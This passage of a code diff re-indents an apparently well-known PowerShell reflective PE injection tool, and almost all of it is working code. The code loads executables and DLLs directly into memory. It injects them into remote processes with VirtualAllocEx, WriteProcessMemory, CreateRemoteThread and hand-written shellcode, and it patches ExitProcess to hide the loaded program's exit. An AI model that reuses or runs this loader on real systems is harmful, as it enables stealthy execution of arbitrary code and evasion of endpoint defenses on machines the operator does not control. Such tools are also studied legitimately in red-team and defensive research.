+        #   argv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported.
+        $DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" `
+            , "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll")
+
+        foreach ($Dll in $DllList)
+        {
+            [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)
+            if ($DllHandle -ne [IntPtr]::Zero)
+            {
+                [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln")
+                [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln")
+                if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)
+                {
+                    "Error, couldn't find _wcmdln or _acmdln"
+                }
+
+                $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
+                $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
+
+                #Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state
+                $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])
+                $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])
+                $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
+                $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
+                [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)
+                [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)
+                $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)
+                $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)
+
+                $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
+                if ($Success = $false)
+                {
+                    throw "Call to VirtualProtect failed"
+                }
+                [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)
+                $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
+
+                $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
+                if ($Success = $false)
+                {
+                    throw "Call to VirtualProtect failed"
+                }
+                [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)
+                $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
+            }
+        }
+        #################################################
+
+        #################################################
+        #Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits.
+
+        $ReturnArray = @()
+        $ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process
+
+        #CorExitProcess (compiled in to visual studio c++)
+        [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll")
+        if ($MscoreeHandle -eq [IntPtr]::Zero)
+        {
+            throw "mscoree handle null"
+        }
+        [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess")
+        if ($CorExitProcessAddr -eq [IntPtr]::Zero)
+        {
+            Throw "CorExitProcess address not found"
+        }
+        $ExitFunctions += $CorExitProcessAddr
+
+        #ExitProcess (what non-managed programs use)
+        [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess")
+        if ($ExitProcessAddr -eq [IntPtr]::Zero)
+        {
+            Throw "ExitProcess address not found"
+        }
+        $ExitFunctions += $ExitProcessAddr
+
+        [UInt32]$OldProtectFlag = 0
+        foreach ($ProcExitFunctionAddr in $ExitFunctions)
+        {
+            $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr
+            #The following is the shellcode (Shellcode: ExitThread.asm):
+            #32bit shellcode
+            [Byte[]]$Shellcode1 = @(0xbb)
+            [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
+            #64bit shellcode (Shellcode: ExitThread.asm)
+            if ($PtrSize -eq 8)
+            {
+                [Byte[]]$Shellcode1 = @(0x48, 0xbb)
+                [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
+            }
+            [Byte[]]$Shellcode3 = @(0xff, 0xd3)
+            $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length
+
+            [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread")
+            if ($ExitThreadAddr -eq [IntPtr]::Zero)
+            {
+                Throw "ExitThread address not found"
+            }
+
+            $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
+            if ($Success -eq $false)
+            {
+                Throw "Call to VirtualProtect failed"
+            }
+
+            #Make copy of original ExitProcess bytes
+            $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
+            $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null
+            $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)
+
+            #Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then
+            #   call ExitThread
+            Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp
+            $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)
+            [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)
+            $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
+            Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp
+            $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)
+            [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)
+            $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
+            Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp
+
+            $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
+        }
+        #################################################
+
+        Write-Output $ReturnArray
+    }
+
+    #This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count)
+    #   It copies Count bytes from Source to Destination.
+    Function Copy-ArrayOfMemAddresses
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [Array[]]
+        $CopyInfo,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [System.Object]
+        $Win32Functions,
+
+        [Parameter(Position = 2, Mandatory = $true)]
+        [System.Object]
+        $Win32Constants
+        )
+
+        [UInt32]$OldProtectFlag = 0
+        foreach ($Info in $CopyInfo)
+        {
+            $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
+            if ($Success -eq $false)
+            {
+                Throw "Call to VirtualProtect failed"
+            }
+
+            $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null
+
+            $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
+        }
+    }
+
+
+    #####################################
+    ##########    FUNCTIONS   ###########
+    #####################################
+    Function Get-MemoryProcAddress
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [IntPtr]
+        $PEHandle,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [String]
+        $FunctionName
+        )
+
+        $Win32Types = Get-Win32Types
+        $Win32Constants = Get-Win32Constants
+        $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
+
+        #Get the export table
+        if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)
+        {
+            return [IntPtr]::Zero
+        }
+        $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)
+        $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)
+
+        for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)
+        {
+            #AddressOfNames is an array of pointers to strings of the names of the functions exported
+            $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
+            $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))
+            $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)
+
+            if ($Name -ceq $FunctionName)
+            {
+                #AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions
+                #    which contains the offset of the function in to the DLL
+                $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))
+                $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])
+                $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
+                $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])
+                return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)
+            }
+        }
+
+        return [IntPtr]::Zero
+    }
+
+
+    Function Invoke-MemoryLoadLibrary
+    {
+        Param(
+        [Parameter( Position = 0, Mandatory = $true )]
+        [Byte[]]
+        $PEBytes,
+
+        [Parameter(Position = 1, Mandatory = $false)]
+        [String]
+        $ExeArgs,
+
+        [Parameter(Position = 2, Mandatory = $false)]
+        [IntPtr]
+        $RemoteProcHandle,
 
         [Parameter(Position = 3)]
         [Bool]
         $ForceASLR = $false
-		)
-		
-		$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
-		
-		#Get Win32 constants and functions
-		$Win32Constants = Get-Win32Constants
-		$Win32Functions = Get-Win32Functions
-		$Win32Types = Get-Win32Types
-		
-		$RemoteLoading = $false
-		if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))
-		{
-			$RemoteLoading = $true
-		}
-		
-		#Get basic PE information
-		Write-Verbose "Getting basic PE information from the file"
-		$PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types
-		$OriginalImageBase = $PEInfo.OriginalImageBase
-		$NXCompatible = $true
-		if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
-		{
-			Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue
-			$NXCompatible = $false
-		}
-		
-		
-		#Verify that the PE and the current process are the same bits (32bit or 64bit)
-		$Process64Bit = $true
-		if ($RemoteLoading -eq $true)
-		{
-			$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
-			$Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process")
-			if ($Result -eq [IntPtr]::Zero)
-			{
-				Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit"
-			}
-			
-			[Bool]$Wow64Process = $false
-			$Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)
-			if ($Success -eq $false)
-			{
-				Throw "Call to IsWow64Process failed"
-			}
-			
-			if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))
-			{
-				$Process64Bit = $false
-			}
-			
-			#PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly
-			$PowerShell64Bit = $true
-			if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
-			{
-				$PowerShell64Bit = $false
-			}
-			if ($PowerShell64Bit -ne $Process64Bit)
-			{
-				throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process"
-			}
-		}
-		else
-		{
-			if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
-			{
-				$Process64Bit = $false
-			}
-		}
-		if ($Process64Bit -ne $PEInfo.PE64Bit)
-		{
-			Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)"
-		}
-		
-
-		#Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address
-		Write-Verbose "Allocating memory for the PE and write its headers to memory"
-		
+        )
+
+        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
+
+        #Get Win32 constants and functions
+        $Win32Constants = Get-Win32Constants
+        $Win32Functions = Get-Win32Functions
+        $Win32Types = Get-Win32Types
+
+        $RemoteLoading = $false
+        if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))
+        {
+            $RemoteLoading = $true
+        }
+
+        #Get basic PE information
+        Write-Verbose "Getting basic PE information from the file"
+        $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types
+        $OriginalImageBase = $PEInfo.OriginalImageBase
+        $NXCompatible = $true
+        if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
+        {
+            Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue
+            $NXCompatible = $false
+        }
+
+        #Verify that the PE and the current process are the same bits (32bit or 64bit)
+        $Process64Bit = $true
+        if ($RemoteLoading -eq $true)
+        {
+            $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
+            $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process")
+            if ($Result -eq [IntPtr]::Zero)
+            {
+                Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit"
+            }
+
+            [Bool]$Wow64Process = $false
+            $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)
+            if ($Success -eq $false)
+            {
+                Throw "Call to IsWow64Process failed"
+            }
+
+            if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))
+            {
+                $Process64Bit = $false
+            }
+
+            #PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly
+            $PowerShell64Bit = $true
+            if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
+            {
+                $PowerShell64Bit = $false
+            }
+            if ($PowerShell64Bit -ne $Process64Bit)
+            {
+                throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process"
+            }
+        }
+        else
+        {
+            if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
+            {
+                $Process64Bit = $false
+            }
+        }
+        if ($Process64Bit -ne $PEInfo.PE64Bit)
+        {
+            Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)"
+        }
+
+        #Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address
+        Write-Verbose "Allocating memory for the PE and write its headers to memory"
+
         #ASLR check
-		[IntPtr]$LoadAddr = [IntPtr]::Zero
+        [IntPtr]$LoadAddr = [IntPtr]::Zero
         $PESupportsASLR = ([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
-		if ((-not $ForceASLR) -and (-not $PESupportsASLR))
-		{
-			Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)" -WarningAction Continue
-			[IntPtr]$LoadAddr = $OriginalImageBase
-		}
+        if ((-not $ForceASLR) -and (-not $PESupportsASLR))
+        {
+            Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)" -WarningAction Continue
+            [IntPtr]$LoadAddr = $OriginalImageBase
+        }
         elseif ($ForceASLR -and (-not $PESupportsASLR))
         {
             Write-Verbose "PE file doesn't support ASLR but -ForceASLR is set. Forcing ASLR on the PE file. This could result in a crash."
@@ -2422,479 +2405,479 @@ $RemoteScriptBlock = {
             Write-Error "PE doesn't support ASLR. Cannot load a non-ASLR PE in to a remote process" -ErrorAction Stop
         }
 
-		$PEHandle = [IntPtr]::Zero				#This is where the PE is allocated in PowerShell
-		$EffectivePEHandle = [IntPtr]::Zero		#This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process.
-		if ($RemoteLoading -eq $true)
-		{
-			#Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup
-			$PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
-			
-			#todo, error handling needs to delete this memory if an error happens along the way
-			$EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
-			if ($EffectivePEHandle -eq [IntPtr]::Zero)
-			{
-				Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use"
-			}
-		}
-		else
-		{
-			if ($NXCompatible -eq $true)
-			{
-				$PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
-			}
-			else
-			{
-				$PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
-			}
-			$EffectivePEHandle = $PEHandle
-		}
-		
-		[IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)
-		if ($PEHandle -eq [IntPtr]::Zero)
-		{ 
-			Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)."
-		}		
-		[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null
-		
-		
-		#Now that the PE is in memory, get more detailed information about it
-		Write-Verbose "Getting detailed PE information from the headers loaded in memory"
-		$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
-		$PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress
-		$PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle
-		Write-Verbose "StartAddress: $(Get-Hex $PEHandle)    EndAddress: $(Get-Hex $PEEndAddress)"
-		
-		
-		#Copy each section from the PE in to memory
-		Write-Verbose "Copy PE sections in to memory"
-		Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types
-		
-		
-		#Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded
-		Write-Verbose "Update memory addresses based on where the PE was actually loaded in memory"
-		Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types
-
-		
-		#The PE we are in-memory loading has DLLs it needs, import those DLLs for it
-		Write-Verbose "Import DLL's needed by the PE we are loading"
-		if ($RemoteLoading -eq $true)
-		{
-			Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle
-		}
-		else
-		{
-			Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
-		}
-		
-		
-		#Update the memory protection flags for all the memory just allocated
-		if ($RemoteLoading -eq $false)
-		{
-			if ($NXCompatible -eq $true)
-			{
-				Write-Verbose "Update memory protection flags"
-				Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types
-			}
-			else
-			{
-				Write-Verbose "PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute"
-			}
-		}
-		else
-		{
-			Write-Verbose "PE being loaded in to a remote process, not adjusting memory permissions"
-		}
-		
-		
-		#If remote loading, copy the DLL in to remote process memory
-		if ($RemoteLoading -eq $true)
-		{
-			[UInt32]$NumBytesWritten = 0
-			$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)
-			if ($Success -eq $false)
-			{
-				Throw "Unable to write shellcode to remote process memory."
-			}
-		}
-		
-		
-		#Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function
-		if ($PEInfo.FileType -ieq "DLL")
-		{
-			if ($RemoteLoading -eq $false)
-			{
-				Write-Verbose "Calling dllmain so the DLL knows it has been loaded"
-				$DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
-				$DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
-				$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
-				
-				$DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null
-			}
-			else
-			{
-				$DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
-			
-				if ($PEInfo.PE64Bit -eq $true)
-				{
-					#Shellcode: CallDllMain.asm
-					$CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)
-					$CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)
-					$CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
-				}
-				else
-				{
-					#Shellcode: CallDllMain.asm
-					$CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)
-					$CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)
-					$CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)
-				}
-				$SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)
-				$SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
-				$SCPSMemOriginal = $SCPSMem
-				
-				Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem
-				$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)
-				[System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)
-				$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
-				Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem
-				$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)
-				[System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)
-				$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
-				Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem
-				$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)
-				
-				$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
-				if ($RSCAddr -eq [IntPtr]::Zero)
-				{
-					Throw "Unable to allocate memory in the remote process for shellcode"
-				}
-				
-				$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
-				if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
-				{
-					Throw "Unable to write shellcode to remote process memory."
-				}
-
-				$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
-				$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
-				if ($Result -ne 0)
-				{
-					Throw "Call to CreateRemoteThread to call GetProcAddress failed."
-				}
-				
-				$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
-			}
-		}
-		elseif ($PEInfo.FileType -ieq "EXE")
-		{
-			#Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process
-			[IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)
-			[System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)
-			$OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
-
-			#If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread
-			#	This way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.
-			[IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
-			Write-Verbose "Call EXE Main function. Address: $(Get-Hex $ExeMainPtr). Creating thread for the EXE to run in."
-
-			$Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null
-
-			while($true)
-			{
-				[Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)
-				if ($ThreadDone -eq 1)
-				{
-					Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants
-					Write-Verbose "EXE thread has completed."
-					break
-				}
-				else
-				{
-					Start-Sleep -Seconds 1
-				}
-			}
-		}
-		
-		return @($PEInfo.PEHandle, $EffectivePEHandle)
-	}
-	
-	
-	Function Invoke-MemoryFreeLibrary
-	{
-		Param(
-		[Parameter(Position=0, Mandatory=$true)]
-		[IntPtr]
-		$PEHandle
-		)
-		
-		#Get Win32 constants and functions
-		$Win32Constants = Get-Win32Constants
-		$Win32Functions = Get-Win32Functions
-		$Win32Types = Get-Win32Types
-		
